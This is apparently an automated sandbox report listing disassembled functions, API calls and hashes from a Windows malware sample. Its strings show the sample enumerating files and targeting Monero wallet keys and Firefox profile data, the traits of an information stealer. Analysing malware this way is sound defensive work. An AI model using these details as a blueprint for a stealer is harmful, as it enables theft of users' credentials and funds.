                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 4c6c11e1c01e713aee3874d36962b153e90e2ee7afa13e35a056eacea4cb4edf
                            • Instruction ID: 093896db27b8fa9f6131f827a6a32bac42bf24231016cd7b5c949a1b93c61f71
                            • Opcode Fuzzy Hash: 4c6c11e1c01e713aee3874d36962b153e90e2ee7afa13e35a056eacea4cb4edf
                            • Instruction Fuzzy Hash: 41A15471A002189FDB35DF64DC89FEE7779BB44300F044688BA4D96185DB74AB88DF61
                            APIs
                            • wsprintfA.USER32 ref: 00F44B7C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00F44B93
                            • StrCmpCA.SHLWAPI(?,00F50FC4), ref: 00F44BC1
                            • StrCmpCA.SHLWAPI(?,00F50FC8), ref: 00F44BD7
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F44DCD
                            • FindClose.KERNEL32(000000FF), ref: 00F44DE2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: febc3b7a816ee7bd377561c98956ce646da2f89d01e3faee04ea003601420e7b
                            • Instruction ID: b762fe9f4304804f74730ac80236ed55e08090c4481e93fafd40bf9092db0a93
                            • Opcode Fuzzy Hash: febc3b7a816ee7bd377561c98956ce646da2f89d01e3faee04ea003601420e7b
                            • Instruction Fuzzy Hash: AF613972900118ABDB35EBA0EC49FEA777CFB48701F044688BA4996145EF74EB48DF91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F447D0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F447D7
                            • wsprintfA.USER32 ref: 00F447F6
                            • FindFirstFileA.KERNEL32(?,?), ref: 00F4480D
                            • StrCmpCA.SHLWAPI(?,00F50FAC), ref: 00F4483B
                            • StrCmpCA.SHLWAPI(?,00F50FB0), ref: 00F44851
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F448DB
                            • FindClose.KERNEL32(000000FF), ref: 00F448F0
                            • lstrcat.KERNEL32(?,0098E470), ref: 00F44915
                            • lstrcat.KERNEL32(?,0098D4D8), ref: 00F44928
                            • lstrlen.KERNEL32(?), ref: 00F44935
                            • lstrlen.KERNEL32(?), ref: 00F44946
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 188b7ccaee5d461933f433d39a1ffe7a77d905fb900db82226d94de164a74b63
                            • Instruction ID: 058e4a7ffe7ba7ea3a00523f014ab9699833f33fcbfe1a1c939e885d1b3bcd2c
                            • Opcode Fuzzy Hash: 188b7ccaee5d461933f433d39a1ffe7a77d905fb900db82226d94de164a74b63
                            • Instruction Fuzzy Hash: 295176719402189BDB20EB70DC8DFED777CAB58300F004688BA4996085DB74EB84DFA1
                            APIs
                            • wsprintfA.USER32 ref: 00F44113
                            • FindFirstFileA.KERNEL32(?,?), ref: 00F4412A
                            • StrCmpCA.SHLWAPI(?,00F50F94), ref: 00F44158
                            • StrCmpCA.SHLWAPI(?,00F50F98), ref: 00F4416E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F442BC
                            • FindClose.KERNEL32(000000FF), ref: 00F442D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: 9fd6247bf05bec3042a67a149d445054c4805b150d8546e9325212eab308af6d
                            • Instruction ID: 220633a51518715f596d99a5d1154d3b371d5fc5b5700963ba1546348f0db6c4
                            • Opcode Fuzzy Hash: 9fd6247bf05bec3042a67a149d445054c4805b150d8546e9325212eab308af6d
                            • Instruction Fuzzy Hash: 7C5158B2900118AFDB25EBB0DC49FEE777CBB54300F004688BA4996045DB75AB89DF54
                            APIs
                            • wsprintfA.USER32 ref: 00F3EE3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 00F3EE55
                            • StrCmpCA.SHLWAPI(?,00F51630), ref: 00F3EEAB
                            • StrCmpCA.SHLWAPI(?,00F51634), ref: 00F3EEC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F3F3AE
                            • FindClose.KERNEL32(000000FF), ref: 00F3F3C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: f19ccee087cfa2e62e1ba7a359daa934b1b359491260a91c90b2958fc5ad7269
                            • Instruction ID: 7d4e15956485b022da3087153a469d3ba8f67404b61f16025d5e661794e7d718
                            • Opcode Fuzzy Hash: f19ccee087cfa2e62e1ba7a359daa934b1b359491260a91c90b2958fc5ad7269
                            • Instruction Fuzzy Hash: 17E164729511189BEB55FB60CCA2EEE773DAF50300F4045D9B90A62092EF346F89DF52
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                            • API String ID: 0-1562099544
                            • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                            • Instruction ID: 5b7cc40c466f8631baaefeab186672acb9d548a137fba83f41b434649e913d08
                            • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                            • Instruction Fuzzy Hash: A1E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F516B0,00F50D97), ref: 00F3F81E
                            • StrCmpCA.SHLWAPI(?,00F516B4), ref: 00F3F86F
                            • StrCmpCA.SHLWAPI(?,00F516B8), ref: 00F3F885
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F3FBB1
                            • FindClose.KERNEL32(000000FF), ref: 00F3FBC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: 3a6145f3a1bfa7e518c05b2fd6953aabcc6d87ea98395a65b45f046aba759725
                            • Instruction ID: 5f84bca6eeeb1d3aa9ceddce54de0e85da5fb0b4ab141c95f0807e992adab216
                            • Opcode Fuzzy Hash: 3a6145f3a1bfa7e518c05b2fd6953aabcc6d87ea98395a65b45f046aba759725
                            • Instruction Fuzzy Hash: 33B14572A401189BDB25FF60DD96FEE7779AF94300F0045A8E90A57181EF34AB48DF92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (~@?$0jol$Cmo?$KHx4$Rx}$V"q<$ky/I$pq_;$yRW_$}]A$~}?
                            • API String ID: 0-1588815052
                            • Opcode ID: 6c7b81e6258bcff936e69edb93448f6b8384c1c4be413f5d3d21ac2d8432c49f
                            • Instruction ID: a57faba1d844626fa744b05d7aa2b3e0a99275299b454d470e8064df3c5b16ad
                            • Opcode Fuzzy Hash: 6c7b81e6258bcff936e69edb93448f6b8384c1c4be413f5d3d21ac2d8432c49f
                            • Instruction Fuzzy Hash: B1B215F3A0C2009FE7046E29EC8577AFBE9EF94320F1A493DE6C4C7744EA7558058696
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F5523C,?,?,?,00F552E4,?,?,00000000,?,00000000), ref: 00F31963
                            • StrCmpCA.SHLWAPI(?,00F5538C), ref: 00F319B3
                            • StrCmpCA.SHLWAPI(?,00F55434), ref: 00F319C9
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F31D80
                            • DeleteFileA.KERNEL32(00000000), ref: 00F31E0A
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F31E60
                            • FindClose.KERNEL32(000000FF), ref: 00F31E72
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: a04823ab3ff25d3ff5dc4f6cb168875a87468d219f9830599590ec8c91dc13d0
                            • Instruction ID: 8cc7d40debcc6c5e29b6a0e62b88219ac3f9e83772357228d868b22c341c3561
                            • Opcode Fuzzy Hash: a04823ab3ff25d3ff5dc4f6cb168875a87468d219f9830599590ec8c91dc13d0
                            • Instruction Fuzzy Hash: 0F1243719505289BDB15FB60CCA6EEE7739BF54300F4045D9B90A62091EF386F88EF62
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00F50C32), ref: 00F3DF5E
                            • StrCmpCA.SHLWAPI(?,00F515C0), ref: 00F3DFAE
                            • StrCmpCA.SHLWAPI(?,00F515C4), ref: 00F3DFC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F3E4E0
                            • FindClose.KERNEL32(000000FF), ref: 00F3E4F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 5816b88914bb154f3bf926f9d4df32d5e5daad06f13fd9e327ad5a0b377a429b
                            • Instruction ID: fa6a0ad9e1a7c2e78a7d5bddc5f2d5e1bff21d91683dd3c215fea7e410beeb48
                            • Opcode Fuzzy Hash: 5816b88914bb154f3bf926f9d4df32d5e5daad06f13fd9e327ad5a0b377a429b
                            • Instruction Fuzzy Hash: 3DF11F719505289BDB26FB60CCA6EEE7739BF54300F4045D9B90A62091EF346F88DF62
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
